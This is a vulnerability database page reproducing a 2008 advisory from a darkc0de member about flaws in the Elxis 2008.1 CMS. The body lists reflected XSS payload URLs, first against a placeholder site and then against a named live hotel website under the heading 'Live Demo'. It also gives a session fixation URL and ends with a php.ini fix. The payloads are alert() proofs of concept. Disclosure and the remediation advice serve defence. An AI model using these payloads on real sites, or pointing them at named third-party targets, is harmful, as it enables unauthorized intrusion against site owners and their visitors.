Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

elxis-xss.txt

🗓️ 14 Oct 2008 00:00:00Reported by swappie aka faithloveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

Elxis 2008.1 Nemesis security vulnerabilities including XSS and session fixatio

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
################################################################   
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 #  
# -C1c4Tr1Z -Gabitzu and all darkc0de members #   
;###############################################################   
#   
# Author: swappie [aka] faithlove   
#   
# Home : www.darkc0de.com  
#  
# Email : [email protected]  
#   
# Do researching and share!   
#   
;###############################################################   
#   
# Title: Elxis 2008.1 Nemesis  
#  
# Issue Date: Monday, 29 September 2008  
#  
# CMS Link: http://www.elxis-downloads.com/fserver/96.html  
  
# Vendor: http://www.elxis.org/  
#   
#  
;###############################################################  
#  
# Dork: I'm sure you can figure that by yourself, right?  
#  
#################################################################  
  
  
----------  
XSS Vulns;  
----------  
  
http://www.site.com/?>'"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>  
  
----------  
Live Demo;  
----------  
  
http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>  
  
  
;==================================================================;  
;==================================================================;  
  
-----------------  
Session Fixation;  
-----------------  
  
  
http://www.site.com/?PHPSESSID=[session_fixation]  
  
Explanation:  
  
The user's session ID could be fixed by the attacker before the user  
even logs on the target server so it wouldn't be needed to get the session  
ID afterwards.  
  
How to fix the "session fixation" ?  
  
There is a simple way to do it.  
  
Step 1.  
  
Open the file named php.ini from your server.  
  
Step 2.  
  
Look through the file for the following lines:  
  
; This option enables administrators to make their users invulnerable to  
; attacks which involve passing session ids in URLs; defaults to 0.  
  
; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!!  
  
  
Step 3.  
  
=> [ and make it look like this: ]  
  
; This option enables administrators to make their users invulnerable to  
; attacks which involve passing session ids in URLs; defaults to 0.  
  
session.use_only_cookies = 1  
  
Step 4.  
  
Restart the web server, php, whatever.  
  
  
  
Cheers,  
  
swappie [aka] faithlove`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
elxis cmsxsssession fixation
16
.json
Report